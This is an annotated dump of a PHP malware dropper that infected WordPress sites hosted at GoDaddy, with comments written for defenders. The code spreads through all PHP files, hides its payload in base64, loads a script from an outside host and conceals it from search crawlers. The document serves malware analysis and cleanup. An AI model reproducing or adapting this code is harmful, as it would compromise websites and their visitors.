Description: Code used to insert malicious JavaScript into many
WordPress sites hosted at GoDaddy.
Malware dump:
Decoded dump:
// NOTE(review): this is the decoded dump as published. Straight quotes appear
// as typographic quotes and newline escapes appear as a bare "n" (presumably
// altered by the publishing page), so the listing is for reading, not running.
// Removes PHP's execution time limit for this request (0 = no limit),
// presumably so the recursive directory walk below is not cut short.
set_time_limit(0);
// inject($f, $inj): prepends the string $inj to the file at path $f and
// overwrites that file in place.
//   $f   - path of the file to modify
//   $inj - text placed at the very start of the file
// Returns nothing. The global $totalinjected is incremented on every path that
// reaches the end of the function, including failed writes, because the
// fopen/fwrite/fclose calls are error-suppressed and their results unchecked.
// Defender note: a file modified here begins with $inj; the literal tested in
// the third strstr() call below is the prefix to search for when scanning a
// site for affected files.
function inject($f,$inj){
global $totalinjected;
// Whole file is read into memory; the return value is not checked.
$c = file_get_contents($f);
// Files containing this string are left untouched (presumably existing web
// shells are skipped on purpose - not confirmed by the dump).
if (strstr($c,”r57shell”)) return;
// Files containing "@zend" are left untouched (presumably Zend-encoded files
// that a prepended block would break - TODO confirm).
if (strstr($c,”@zend”)) return;
// Files that already carry the eval(base64_decode( prefix are skipped, so a
// file is not modified twice.
if (strstr($c,’<?php /**/ eval(base64_decode(‘)) return;
// File starts with the same 10-character prefix but did not match the check
// above: everything through the first PHP closing tag is dropped. Presumably
// this removes a leading block left by a different variant - confirm.
// strpos() is not checked for false; with no closing tag the offset becomes 2
// and the file loses its first two bytes, so affected files may be damaged
// beyond the prepended block and are best restored from a known-good copy.
if (substr($c,0,10)==’<?php /**/’){
$k=strpos($c,’?>’)+2;
$c=substr($c,$k);
}
// New content = injected text followed by the (possibly trimmed) original.
$c = $inj.$c;
// Overwrite in place; every call is silenced with @, so permission errors
// leave no PHP warning behind.
$h2 = @fopen ($f, “w”);@fwrite($h2, $c);@fclose($h2);
$totalinjected++;
}
// inject_in_folder($dir): walks $dir recursively and calls inject() on every
// regular file whose last dot-separated segment is "php" (case-insensitive).
//   $dir - directory to start from
// Reads the global $encoded and passes it, followed by "n", to inject().
// Directory-handle calls are silenced with @, so directories that cannot be
// opened are skipped without any warning.
// Defender note: the walk is not restricted to known application files, so
// every .php file under the starting directory has to be checked during
// cleanup, including plugins, themes and unrelated scripts.
function inject_in_folder($dir){
global $encoded;
if (is_dir($dir)) {
if ($dh = @opendir($dir)) {
while (($file = @readdir($dh)) !== false) {
// Skip the current-directory and parent-directory entries.
if (($file==”.”)||($file==”..”))continue;
$k=$dir.”/”.$file;
if (is_dir($k)){
// Descend into subdirectories; there is no depth limit in this code.
inject_in_folder($k);
}else{
if (is_file($k)){
// Extension = text after the last dot of the full path.
$ext=explode(“.”,$k);
$c=count($ext)-1;
if (strtolower($ext[$c])==”php”){
// "n" is presumably a newline escape whose backslash was lost in publishing.
inject($k,$encoded.”n”);
}
}
}
}
@closedir($dh);
}
}
}
// Path of the script currently executing, i.e. this dropper itself.
$z=$_SERVER["SCRIPT_FILENAME"];
// The dropper deletes its own file before doing anything else (errors
// silenced). Defender note: the dropper is therefore not expected to remain on
// disk; evidence of it has to come from elsewhere, for example web server
// request logs (assumption - the dump does not show how it was delivered).
@unlink($z);
// Base64 of a script tag that loads oo.php from holasionweb.com. That host and
// path are the network indicator in this sample: the tag is what visitors'
// browsers receive in pages served by modified files.
$cod=base64_encode(‘<script src=”http://holasionweb.com/oo.php”></script>’);
// $to_pack holds the PHP source that ends up, base64-wrapped, at the top of
// every modified file. Read as code, the string does the following:
//  - runs only if ob_start exists and $GLOBALS['mr_no'] is unset, then sets
//    mr_no, so it installs once per request even when many included files
//    carry the same block;
//  - gml(): returns the decoded script tag from $cod unless the User-Agent
//    header contains "googlebot" or "yahoo" (case-insensitive), in which case
//    it returns an empty string;
//  - gzdecode(): defined only when missing; reads the flag byte at offset 3,
//    skips the optional header fields after offset 10, inflates the rest, and
//    returns the input unchanged if inflating fails;
//  - mrobh(): output-buffer callback; sends a "Content-Encoding: none" header,
//    passes the buffer through gzdecode(), then inserts gml()'s output before
//    the closing body tag, or appends it when no such tag is present;
//  - ob_start('mrobh') registers that callback.
// Defender note: the script tag is added to responses at output time and is
// withheld from those two crawler user agents, so the rendered HTML should be
// checked with an ordinary browser User-Agent. The names mr_no, mrobh and gml
// do not appear in plain text in modified files, because this string is
// base64-encoded before it is written.
$to_pack=’if(function_exists(‘ob_start’)&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; if(!function_exists(‘mrobh’)){ if(!function_exists(‘gml’)){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],”googlebot”)&& (!stristr($_SERVER["HTTP_USER_AGENT"],”yahoo”))){ return base64_decode(“‘.$cod.’”); } return “”; } } if(!function_exists(‘gzdecode’)){ function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack(‘v’,substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header(‘Content-Encoding: none’); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match(‘/</body/si’,$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace(‘/(</body[^>]*>)/si’,gml().”n”.’$1′,$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start(‘mrobh’); } }’;
// The payload source is base64-encoded, so its function names and the script
// tag are not visible as plain text in the files it is written to.
$to_pack=base64_encode($to_pack);
// Final text handed to inject(): a one-line PHP block that evals the decoded
// payload. Its fixed leading part, up to the opening of base64_decode, is the
// same literal inject() tests for, and is the stable string to scan for.
$encoded=’<?php /**/ eval(base64_decode(“‘.$to_pack.’”));?>’;
// Starting directory = the directory the dropper was placed in; only that
// directory and everything beneath it is walked.
$val=dirname($z);
// Counter incremented by inject().
$totalinjected=0;
// Status text is sent back in the HTTP response to whoever requested the
// dropper. "$valn" is presumably "$val" followed by a newline escape whose
// backslash was lost in publishing.
echo “Working with $valn”;
$start_time=microtime(true);
// Walk and modify files only when a directory name was obtained.
if ($val!=”")inject_in_folder($val);
$end_time=microtime(true)-$start_time;
// Reports how many files reached the end of inject() and the elapsed time.
echo “|Injected| $totalinjected files in $end_time secondsn”;